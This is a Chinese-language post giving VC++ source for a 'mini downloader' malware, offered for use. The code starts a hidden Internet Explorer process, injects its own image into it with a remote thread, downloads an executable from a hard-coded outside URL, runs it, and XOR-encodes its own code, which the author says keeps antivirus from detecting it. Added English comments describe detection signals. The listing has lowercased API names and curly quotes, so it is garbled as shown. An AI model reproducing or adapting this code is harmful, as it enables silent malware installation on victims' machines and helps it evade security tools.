无dll插入进程,下载者vc源代码
增加代码xor解密功能,以逃过杀毒软件.
生成mini下载者,则需要自己做一个工具了.读懂代码,把相应的部份加密即可.
参考delphi版本的下载者源代码,编出来有16k左右。压缩也有10k多,
 于是写了vc的代码。按以下的设置,编译出来2k左右。
 还可以再设置一下编译开关,以减小体积。
ps:原代码中4处没有对转义,以下代码编译通过;
 编译出来16k,去掉4行注释,编译后3k(编译环境:win2003+vc6.0) 
 /* 
 “mini_downloader” 
 code by kardinal p.s.t 
 compile by vc++ 6.0 
 can not run under win98; 
 */ 
 #include <windows.h> 
#pragma comment(lib,”user32.lib”) 
 #pragma comment(lib,”kernel32.lib”) 
//#pragma comment(linker, “/opt:nowin98”) //取消这4行的注释,可编译出2k大的文件 
 //#pragma comment(linker, “/merge:.data=.text”) 
 //#pragma comment(linker, “/merge:.rdata=.text”) 
 //#pragma comment(linker, “/align:0x200”) 
 #pragma comment(linker, “/entry:decrpt”) 
 #pragma comment(linker, “/subsystem:windows”) 
 #pragma comment(linker, “/base:0x13150000”) 
// File-scope state shared by decrpt(), main() and download().
// All three Win32 APIs below are reached through function pointers filled in with
// getprocaddress at run time instead of being linked normally, so the PE import
// table does not name shellexecutea, urldownloadtofilea or createremotethread.
// Defensive note: static import scanning therefore sees almost nothing; the
// observable behaviour is the run-time loadlibrary/getprocaddress sequence.
hinstance (winapi *shellrun)(hwnd,lpctstr, lpctstr, lpctstr ,lpctstr , int );// shellexecutea, resolved at run time from shell32.dll 
 dword (winapi *downfile) (lpctstr ,lpctstr, lpctstr ,dword, lpctstr);// urldownloadtofilea, resolved at run time from urlmon.dll 
 handle (winapi *myinject) (handle, lpsecurity_attributes, dword,lpthread_start_routine, lpvoid, dword, lpdword); // createremotethread: creates a thread in another process and starts it 
 handle processhandle; // handle to the target browser process, opened in main() 
 dword pid; // process id of the target browser process, filled in by main() 
 hinstance hshell,hurlmon,hkernel; // module handles for shell32.dll, urlmon.dll and kernel32.dll 
// Payload routine. main() copies this process image into the target browser
// process and starts a remote thread at this function; decrpt() is the routine
// that XOR-decodes these bytes at start-up, so the on-disk form of this function
// is expected to be encoded (see the comments on decrpt()).
// Defensive note: the hard-coded download URL and the drop path c:\ieinst12.exe
// on the lines below are the host/network indicators of this sample, and the
// closing exitprocess(0) terminates the host browser process, so an unexplained
// browser exit immediately after an outbound file download is a detection signal.
// Because main() asks for the copy to be placed at the same base address that the
// image has in the source process, the global pointers referenced here are
// presumably valid at the same addresses in the target — the pinned linker /base
// appears to exist for that reason (inferred, not shown by this block).
void download() // download routine executed inside the injected-into process 
 { 
 hshell=loadlibrary(“shell32.dll”); 
 hurlmon=loadlibrary(“urlmon.dll”); 
 // Resolve the two APIs by name at run time; neither return value is checked.
(farproc&)shellrun=getprocaddress(hshell,”shellexecutea”); 
 (farproc&)downfile= getprocaddress(hurlmon,”urldownloadtofilea”); 
 // Fetch the remote file to a fixed path on the C: drive, then launch it.
downfile(null,”http://www.testtest.ac.cn/eeeeeeeeeeeeee … eeeeen/notepad.exe”,”c:\ieinst12.exe”,0, null); 
 shellrun(0,”open”,”c:\ieinst12.exe”,null,null,5); 
 // Ends the process this thread is running in, i.e. the browser, not the dropper.
 exitprocess(0); 
 }; 
// Injection driver, called from decrpt() (the linker entry point) once the
// payload bytes have been decoded. It launches a hidden browser, opens it with
// full access, copies this whole process image into it at the same base address
// and starts a remote thread at download().
// Defensive note: every step below is a classic process-injection telemetry
// point — a browser started hidden by an unrelated process, openprocess with
// process_all_access on it, virtualallocex with page_execute_readwrite,
// writeprocessmemory of a full image, and createremotethread resolved by name
// from kernel32. Behavioural/EDR rules on that sequence are the mitigation;
// no return value along the way is checked, so any failure is silent.
void main() // main routine 
 { 
 //1. build the path to iexplore.exe and start it hidden 
 char iename[max_path],iepath[max_path]; 
 zeromemory(iename,sizeof(iename)); 
 zeromemory(iepath,sizeof(iepath)); 
getwindowsdirectory(iepath,max_path); 
 // Takes only the first three characters of the Windows directory (the drive
 // prefix) and appends a fixed path; the location is therefore assumed, not looked up.
 strncpy(iename,iepath,3); 
 strcat(iename,”program files\internet explorer\iexplore.exe”); 
 winexec(iename,sw_hide); 
 sleep(500); 
//2. locate the browser window and open its process 
 hwnd htemp; 
 htemp=findwindow(“ieframe”,null); 
 getwindowthreadprocessid(htemp,&pid); 
 processhandle=openprocess(process_all_access, false, pid); 
//3. allocate memory in the target 
 hmodule module; 
 lpvoid newmodule; 
 dword size; 
 lpdword lpimagesize; 
module = getmodulehandle(null);// base address of this process image 
 // Read the image size straight from this image's own PE headers:
 // [base+0x3c] is e_lfanew (offset of the NT headers) and NT headers + 0x50
 // is the optional header's SizeOfImage field; the value lands in lpimagesize.
 _asm 
 { 
 push eax; 
 push ebx; 
 mov ebx,module; 
 mov eax,[ebx+0x3c]; 
 lea eax,[ebx+eax+0x50]; 
 mov eax,[eax] 
 mov lpimagesize,eax; 
 pop ebx; 
 pop eax; 
 }; 
 size=(dword)lpimagesize; 
 // Requests the copy at exactly the same address the image occupies here, and
 // as an RWX region; the result is not checked.
 newmodule = virtualallocex(processhandle, module, size, mem_commit | mem_reserve, page_execute_readwrite); // place the copy at this image's own base address 
//4. write the image and create the remote thread
writeprocessmemory(processhandle, newmodule, module, size, null);// copy the whole image 
 lpthread_start_routine entrypoint; 
 // Takes the address of download() as the remote thread's start routine; it is
 // valid in the target only because the copy sits at the same base address.
 __asm 
 { 
 push eax; 
 lea eax,download; 
 mov entrypoint,eax; 
 pop eax 
 } 
 // createremotethread is resolved by name rather than imported, again to keep it
 // out of the static import table.
 hkernel=loadlibrary(“kernel32.dll”); 
 (farproc&)myinject= getprocaddress(hkernel,”createremotethread”); 
 myinject(processhandle, null, 0, entrypoint, module, 0, null); // create the remote thread and run it 
//5. release the handle 
 closehandle(processhandle); 
return; 
 } ; 
// Decoder and real program entry point (the linker pragma near the top of the
// file sets /entry:decrpt, so this runs before any CRT start-up).
// The bytes between download() and decrpt() are expected to be stored on disk
// XOR-encoded with a single-byte key (the post says the author applies that with
// a separate tool). This routine makes that code page writable, saves a copy,
// then for every candidate key 1..0xff decodes the saved copy back over
// download() and tries to run main(); a wrong key is expected to fault and is
// swallowed by the SEH handler, and the loop moves on to the next key.
// Defensive note: the page over the image's own code is turned
// page_execute_readwrite (a writable+executable page whose contents no longer
// match the file on disk), the code is rewritten up to 255 times, and repeated
// access violations are caught in a loop — memory-integrity and exception-rate
// monitoring see this even though no signature matches the on-disk bytes.
// The layout dependence (lea of download and decrpt) means this function relies
// on the linker placing the two routines adjacently and in this order.
 void decrpt() 
 { 
handle myps; 
 dword oldattr; 
 byte shellcode[500]; // scratch copy of the encoded download() bytes 
 zeromemory(shellcode,sizeof(shellcode)); 
 myps=getcurrentprocess(); 
 // Make the page containing download() writable and executable in this process.
 ::virtualprotectex(myps,&download,0x1000,page_execute_readwrite,&oldattr); 
 // First copy the original (still encoded) bytes into the local buffer.
 // Length = address of decrpt minus address of download; the copy is not
 // limited by sizeof(shellcode).
 _asm 
 { 
 pushad; 
 lea esi,download 
 lea edi,shellcode; 
 lea ecx,decrpt; 
 sub ecx,esi; 
 en1: 
 lodsb; 
 stosb; 
 dec ecx; 
 jne en1; 
 popad; 
};
// Decode and copy back, one candidate key per iteration 
 int i; 
 for (i=1;i<=0xff;i++) 
 { 
 // XOR every saved byte with the current key value i and write it over download().
 _asm 
 { 
 pushad; 
 lea esi,shellcode; 
 lea edi,download; 
 lea ecx,decrpt; 
 sub ecx,edi; 
 en2: 
 lodsb; 
 mov ebx,i; 
 xor al,bl; 
 stosb; 
 dec ecx; 
 jne en2; 
 popad; 
};
// Author's claim: this structure keeps ordinary antivirus products from recognising the file as a virus. 
// Defensive note: an exception raised by running wrongly decoded code is caught here
// and the next key is tried; the burst of structured exceptions is itself observable.
 __try 
 { 
 main(); 
 return; 
 } 
 __except(exception_execute_handler) 
{
};
 } 
 return; 
 };